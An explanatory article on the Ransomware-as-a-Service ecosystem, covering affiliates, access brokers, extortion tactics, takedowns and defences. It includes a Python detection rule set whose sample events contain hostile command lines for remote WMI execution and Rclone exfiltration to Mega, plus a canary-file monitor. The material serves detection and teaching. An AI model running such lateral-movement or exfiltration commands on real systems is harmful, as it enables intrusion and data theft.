Ransomware is no longer the work of lone hackers writing malware in their basements. It is a mature criminal industry with specialised roles, supply chains, franchise models, customer support, and revenue-sharing agreements. The Ransomware-as-a-Service (RaaS) model has industrialised cyber extortion, enabling any skilled network intruder to deploy enterprise-grade ransomware without writing a single line of malware code.
Understanding how the RaaS ecosystem operates is not academic. Every aspect of the criminal supply chain reveals a defensive opportunity. When you understand how attackers buy access, move laterally, exfiltrate data, and negotiate ransoms, you can build defences that disrupt their operations at every stage.
The RaaS Business Model
Operators vs Affiliates
The RaaS model separates two distinct skill sets into specialised roles:
- Operators — the developers and administrators. They build the ransomware encryptor, maintain the command-and-control infrastructure, operate the data-leak site, run the victim-negotiation portal, handle cryptocurrency payments, and recruit affiliates. Operators are typically small teams (5-15 people) with deep malware-development expertise.
- Affiliates — the operators of the actual attacks. They gain initial access to victim networks, perform reconnaissance, move laterally, escalate privileges, exfiltrate data, and deploy the ransomware payload. Affiliates are experienced network intruders who may work across multiple RaaS platforms simultaneously.
Revenue Models
RaaS platforms use several revenue structures:
- Percentage split — the dominant model. Affiliates keep 70-80% of the ransom, operators take 20-30%. Top performers may negotiate 85/15 splits. LockBit publicly offered affiliates 80% of all payments.
- Subscription model — affiliates pay a monthly fee (typically $500-$2,000) for access to the ransomware toolkit. Less common because it generates less revenue for operators.
- Flat fee per use — affiliates pay a one-time licensing fee ($2,000-$10,000) for a ransomware build. The affiliate keeps 100% of the ransom. Used by smaller RaaS operations.
- Hybrid models — some operations combine a smaller percentage split with an upfront fee, or adjust the split based on the ransom amount (higher affiliate percentage for larger payments).
The IAB Supply Chain
Initial Access Brokers (IABs) are the supply chain that fuels RaaS operations. These specialists focus exclusively on compromising organisations and then selling that access to ransomware affiliates, rather than conducting the ransomware attack themselves.
How IABs Operate
IABs use a range of techniques to establish initial footholds:
- Exploiting perimeter vulnerabilities — unpatched VPN appliances (Fortinet, Pulse Secure, Citrix), remote-desktop gateways, and web-facing applications. CVE exploitation is systematic: IABs scan the internet for vulnerable devices within hours of a vulnerability disclosure.
- Credential stuffing and brute-force — targeting RDP, VPN, and Citrix portals with credential lists from data breaches. Services without MFA are priority targets.
- Phishing and social engineering — delivering malware (Emotet, BumbleBee, QakBot) that establishes a persistent backdoor, which is then sold as validated access.
- Insider recruitment — some IABs recruit insiders (employees, contractors) to install remote-access tools, paying $1,000-$20,000 for access.
IAB Marketplace Economics
Access is sold on dark-web forums and marketplaces with standardised pricing:
- RDP access — $50-$500 per server (basic server access, no domain admin)
- VPN credentials — $500-$3,000 (provides network-level access)
- Domain-admin access — $3,000-$10,000 (full Active Directory control)
- Enterprise cloud access — $2,000-$8,000 (Azure AD global admin, AWS root)
Prices correlate with victim revenue: access to a $500M-revenue company commands 3-5x the price of a $50M-revenue company, because the potential ransom is proportionally higher.
The Evolution of Extortion Tactics
Single Extortion (Pre-2019)
Early ransomware simply encrypted files and demanded payment for the decryption key. If the victim had backups, they could restore without paying. This created a strong incentive for attackers to evolve their tactics.
Double Extortion (2019-Present)
The Maze group pioneered double extortion in late 2019: steal data before encrypting, then threaten to publish the stolen data if the ransom is not paid. Even organisations with perfect backups face the threat of sensitive data being published on a leak site. By 2025, over 90% of RaaS operations practise double extortion as standard procedure.
Triple Extortion
Triple extortion adds a third pressure layer:
- DDoS attacks — some groups launch DDoS attacks against the victim to add urgency during negotiations
- Customer and partner notification — attackers directly contact the victim's customers, partners, or patients (in healthcare attacks) to create external pressure and reputational damage
- Regulatory reporting threats — attackers threaten to report the breach to regulators (SEC, ICO, data protection authorities) and publicly file complaints
Encryption-Less Extortion
A growing trend in 2025-2026: some groups skip encryption entirely and focus solely on data theft and extortion. This approach is faster, quieter, avoids triggering encryption-detection tools, and relies entirely on the threat of data publication. Groups like BianLian and Karakurt have shifted to this model.
RaaS Infrastructure and OPSEC
Technical Infrastructure
A mature RaaS operation maintains extensive infrastructure:
- Builder and panel — a web application (typically on .onion) where affiliates generate customised ransomware builds, track victim infections, and monitor payment status
- Data leak site (DLS) — a Tor-hosted website where stolen data is published if the victim does not pay. Operated as a public-facing threat to pressure victims.
- Negotiation portal — a Tor-hosted chat interface where victims communicate with the attackers. Some operations provide "customer support" with 24/7 response times.
- Cryptocurrency infrastructure — wallets, mixers/tumblers, and chain-hopping services to launder ransom payments. Monero is increasingly preferred over Bitcoin for its privacy features.
- Bulletproof hosting — servers hosted in jurisdictions with weak or uncooperative law-enforcement frameworks. Providers guarantee no takedowns regardless of content.
Operator OPSEC Practices
Sophisticated RaaS operators practise careful operational security:
- Communication through encrypted, ephemeral channels (Tox, Jabber/XMPP with OTR, Session messenger)
- Compartmentalisation: affiliates interact only with their handler, never with other affiliates or core developers
- No attacks on CIS (Commonwealth of Independent States) countries — widely believed to be a tacit agreement with law enforcement in those regions
- Regular infrastructure rotation: new .onion addresses, new bulletproof hosting providers, new cryptocurrency wallets
- Code obfuscation and anti-analysis techniques: sandbox detection, virtual-machine evasion, and encrypted payloads
Major RaaS Operations and Takedowns
LockBit
The most prolific RaaS operation from 2019 to 2024, responsible for an estimated 1,700+ attacks globally. LockBit operated a highly competitive affiliate programme, publicly posted their affiliate terms, and even ran a bug bounty for their malware. Operation Cronos (February 2024) disrupted LockBit's infrastructure, but the group attempted to rebuild before further law-enforcement action degraded their operations.
ALPHV/BlackCat
Notable for being written in Rust (enabling cross-platform targeting), ALPHV/BlackCat was the first major RaaS to offer a searchable leak site where individual data subjects could search for their personal information in stolen data. After an FBI seizure of their infrastructure in December 2023, the group rebounded before conducting an apparent exit scam in March 2024, keeping a $22M ransom from the Change Healthcare attack and leaving affiliates unpaid.
Hive
Disrupted by the FBI in January 2023 after a seven-month covert infiltration. The FBI obtained Hive's decryption keys and distributed them to over 300 victims, preventing an estimated $130M in ransom payments. This operation demonstrated the value of proactive law-enforcement infiltration versus reactive takedowns.
The Fragmentation Effect
Each major takedown fragments the ecosystem but does not eliminate it. Displaced affiliates migrate to new RaaS platforms within weeks. The skills (network intrusion, lateral movement, data exfiltration) transfer directly. New operators emerge to fill the vacuum, often started by former affiliates who understand the business model. The result is a more decentralised, resilient ecosystem.
Defensive Strategy Against RaaS
Defending against RaaS requires disrupting the affiliate kill chain at each phase. No single control is sufficient because the RaaS model allows different affiliates with different techniques to attack the same target.
Phase 1: Prevent Initial Access
- Patch external-facing services within 48 hours of vulnerability disclosure. IABs and affiliates scan for new vulnerabilities within hours. Fortinet, Citrix, Pulse Secure, Microsoft Exchange, and remote-desktop gateways are the most exploited.
- Enforce MFA on every external-facing service: VPN, RDP, email, cloud administrative consoles, SaaS applications. Credential-based attacks are the most common initial-access vector.
- Monitor dark-web marketplaces for IAB listings mentioning your organisation or industry. Threat-intelligence services can alert you if your credentials or network access appear for sale.
- Reduce your attack surface: disable unnecessary external services, restrict RDP to VPN-only access, implement geo-fencing on administrative portals.
Phase 2: Detect Lateral Movement
- Network segmentation limits lateral spread. Segment production environments from backup networks, separate IT from OT, and isolate high-value assets (domain controllers, financial systems, backup infrastructure).
- EDR with behavioural detection identifies living-off-the-land techniques common in affiliate playbooks: PsExec, WMI, PowerShell remoting, Cobalt Strike beacons, and credential-dumping tools (Mimikatz, LaZagne).
- Privileged-access management (PAM): just-in-time administrative access, privileged-account isolation, and monitoring of service-account usage.
Phase 3: Prevent Exfiltration
- Data Loss Prevention (DLP) policies that detect large-volume file access and outbound transfers outside of normal business patterns.
- Outbound traffic monitoring: affiliates commonly exfiltrate data using Rclone, Mega, file.io, and other cloud-storage services. Block or monitor access to these services at the proxy/firewall level.
- Detect staging behaviours: large-scale archive creation (7zip, WinRAR), data being copied to unusual directories, and automated file-collection scripts.
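The Phase 2 and Phase 3 bullets above describe the tooling an EDR or SIEM should flag (PsExec, WMI remote execution, bulk archiving, Rclone and cloud-storage uploads) and note that no single indicator is decisive. The following added example, written for this article rather than taken from it, shows one way to turn those bullets into correlation logic: a small rule set applied to Windows process-creation events (Sysmon Event ID 1 or Security 4688 style fields: timestamp, host, user, image path, command line), with hits grouped per host and user so that lateral movement followed by staging and exfiltration on the same account escalates to a high-severity alert. The sample events are constructed for the example; host names, user names and the time window are assumptions.

```python
"""Triage process-creation events for RaaS-affiliate tradecraft.

Groups rule hits per (host, user) and raises severity when several phases of
the affiliate kill chain (lateral movement, staging, exfiltration) appear on
the same account within a short window. Sample events are constructed for
this example; they are not real telemetry."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (phase, rule name, regex applied to "<image> <command line>")
RULES = [
    ("lateral_movement", "psexec_service", re.compile(r"psexe(c|svc)\.exe", re.I)),
    ("lateral_movement", "wmic_remote_exec", re.compile(r"wmic(\.exe)?\s.*?/node:", re.I)),
    ("lateral_movement", "powershell_remoting", re.compile(r"(Enter|Invoke)-(PSSession|Command)\b", re.I)),
    ("credential_access", "credential_dumper", re.compile(r"(mimikatz|lazagne)", re.I)),
    # Archiver invoked with volume splitting (-v2g) or a UNC source: typical of bulk staging
    ("staging", "bulk_archive", re.compile(r"\b(7z|7za|rar|winrar)(\.exe)?\"?\s+a\b.*?(-v\d+[kmg]\b|\\\\\\\\)", re.I)),
    ("exfiltration", "rclone_cloud_copy", re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\b", re.I)),
    ("exfiltration", "cloud_storage_uploader", re.compile(r"(megacmd|megasync|mega\.exe|file\.io)", re.I)),
]

# Constructed sample events: (timestamp, host, user, image, command_line)
SAMPLE_EVENTS = [
    ("2026-03-01T02:11:04", "FS01", "CORP\\svc_backup", "C:\\Windows\\Temp\\psexesvc.exe", "psexesvc.exe"),
    ("2026-03-01T02:12:30", "FS01", "CORP\\svc_backup", "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "wmic /node:DC01 process call create cmd.exe"),
    ("2026-03-01T02:20:15", "FS01", "CORP\\svc_backup", "C:\\Program Files\\7-Zip\\7z.exe",
     "7z a -mx1 -v2g C:\\Temp\\stage\\finance.7z \\\\FS01\\Finance\\"),
    ("2026-03-01T02:45:51", "FS01", "CORP\\svc_backup", "C:\\Temp\\rclone.exe",
     "rclone copy C:\\Temp\\stage mega:exfil --transfers 32"),
    # Benign: a user zipping one document locally should not trigger anything
    ("2026-03-01T09:03:00", "WS17", "CORP\\jdoe", "C:\\Program Files\\7-Zip\\7z.exe", "7z a report.7z report.docx"),
]


def classify(image: str, command_line: str) -> list:
    """Return [(phase, rule_name)] for every rule matching this event."""
    haystack = f"{image} {command_line}"
    return [(phase, name) for phase, name, rx in RULES if rx.search(haystack)]


def triage(events, window: timedelta = timedelta(hours=2)) -> list:
    """Correlate rule hits per (host, user) and return one alert per account.

    Severity is 'high' when two or more kill-chain phases occur within `window`
    of the first hit, or when any exfiltration rule fires; otherwise 'medium'.
    """
    hits = defaultdict(list)
    for ts, host, user, image, cmd in events:
        for phase, rule in classify(image, cmd):
            hits[(host, user)].append((datetime.fromisoformat(ts), phase, rule))

    alerts = []
    for (host, user), items in hits.items():
        items.sort()
        start = items[0][0]                       # window anchored on the first hit
        in_window = [i for i in items if i[0] - start <= window]
        phases = {phase for _, phase, _ in in_window}
        rules = [rule for _, _, rule in in_window]
        severity = "high" if len(phases) >= 2 or "exfiltration" in phases else "medium"
        alerts.append({"host": host, "user": user, "phases": sorted(phases),
                       "rules": rules, "severity": severity})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Run against the constructed events, the backup service account on FS01 produces a single high-severity alert spanning lateral movement, staging and exfiltration, while the user on WS17 produces nothing. The window is anchored on the first hit for simplicity; a production detector would use a sliding window and tune the staging rule, since legitimate backup jobs also archive UNC paths and an archiver hit on its own is only medium severity here.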
Phase 4: Survive Encryption
- Immutable backups with the 3-2-1-1-0 rule: three copies of the data on two different media, one copy off-site, one copy immutable or air-gapped, and zero errors in automated restore testing. The immutable or air-gapped copy is what survives an affiliate who has domain-admin access and deliberately targets backup infrastructure.
- Canary files and honeypots: deploy files that serve no legitimate purpose but will trigger alerts if accessed or modified, providing early warning of ransomware deployment.
- Tested incident-response plan that accounts for the dual pressure of double extortion: plans for both data restoration and data-breach notification/disclosure.
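The canary-file bullet above says such files should trigger an alert when accessed or modified. As an added illustration, not code from the article, the script below plants a few decoys in a directory, records a hash baseline, and then reports what a deployed encryptor typically leaves behind: decoy contents changed, a decoy renamed under a new extension, a decoy deleted, or a note dropped beside it. The decoy names, the note-name pattern and the temporary directory are constructed assumptions; the `demo()` function tampers with its own temporary files purely to exercise the detector.

```python
"""Canary-file monitor: plant decoys, baseline them, and report tampering.

Example code written for this article. Decoy names, the ransom-note name
pattern and the simulated tampering in demo() are all constructed."""
import hashlib
import os
import re
import tempfile
from pathlib import Path

# Constructed decoy names; in practice they mimic the naming style of the share they sit on.
CANARY_NAMES = ["Q4_payroll_final.xlsx", "passwords_backup.txt", "customer_db_export.csv"]
# Unexpected files whose names look like instructions to the victim.
NOTE_PATTERN = re.compile(r"(readme|restore|recover|decrypt|how_to)", re.I)


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def plant_canaries(root: Path) -> dict:
    """Create the decoys with fixed filler content and return a {name: sha256} baseline."""
    baseline = {}
    for name in CANARY_NAMES:
        p = root / name
        p.write_bytes(f"canary:{name}\n".encode())   # nobody legitimately edits this
        baseline[name] = sha256_of(p)
    return baseline


def check_canaries(baseline: dict, root: Path) -> list:
    """Compare the directory with the baseline; return a list of (kind, detail) findings."""
    findings = []
    present = {p.name: p for p in root.iterdir() if p.is_file()}
    for name, digest in baseline.items():
        if name in present:
            if sha256_of(present[name]) != digest:
                findings.append(("modified", name))
            continue
        # Decoy gone: same stem under a new extension means it was renamed, otherwise deleted
        stem = Path(name).stem
        renamed = [n for n in present if n.startswith(stem) and n != name]
        if renamed:
            findings.append(("renamed", f"{name} -> {renamed[0]}"))
        else:
            findings.append(("deleted", name))
    for n in present:
        if n not in baseline and NOTE_PATTERN.search(Path(n).stem):
            findings.append(("ransom_note", n))
    return findings


def demo() -> list:
    """Plant canaries in a temp dir, simulate the tampering an encryptor causes, return findings."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        baseline = plant_canaries(root)
        if check_canaries(baseline, root):
            raise RuntimeError("clean baseline must produce no findings")
        # Simulated tampering inside our own temp directory
        (root / "Q4_payroll_final.xlsx").write_bytes(os.urandom(64))                      # content replaced
        (root / "passwords_backup.txt").rename(root / "passwords_backup.txt.locked")      # renamed
        (root / "customer_db_export.csv").unlink()                                         # deleted
        (root / "README_RESTORE_FILES.txt").write_text("placeholder note text\n")         # note dropped
        return check_canaries(baseline, root)


if __name__ == "__main__":
    for kind, detail in demo():
        print(f"{kind:12s} {detail}")
```

In deployment the baseline check would run on a schedule or be driven by file-system audit events, and the decoys would live on the file shares an affiliate is likely to enumerate first; the point of the hash comparison is that any change at all is a signal, because the files have no legitimate readers.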
The Evolving Landscape
The RaaS ecosystem is resilient because it is decentralised and market-driven. When law enforcement takes down one operation, affiliates migrate to competitors, and new operators emerge. Several trends are shaping the landscape in 2026:
- Smaller, more agile groups — the era of dominant RaaS brands (LockBit, ALPHV) may be giving way to a more fragmented ecosystem of smaller groups with lower profiles and less law-enforcement attention.
- Encryption-less extortion — pure data-theft extortion avoids encryption-detection tools and requires different defensive strategies focused on DLP and data-access monitoring.
- AI-enhanced operations — AI tools for automating reconnaissance, generating convincing phishing content, and identifying high-value data for exfiltration.
- Targeting of cloud and SaaS — as organisations move to cloud infrastructure, affiliates are developing capabilities for cloud-native attacks (Azure AD, AWS, GCP).
The RaaS model has made ransomware a persistent, adaptable threat that cannot be eliminated through any single intervention. Effective defence requires understanding the criminal ecosystem and building layered controls that disrupt the affiliate kill chain at every phase — from initial access through data exfiltration to encryption and negotiation.
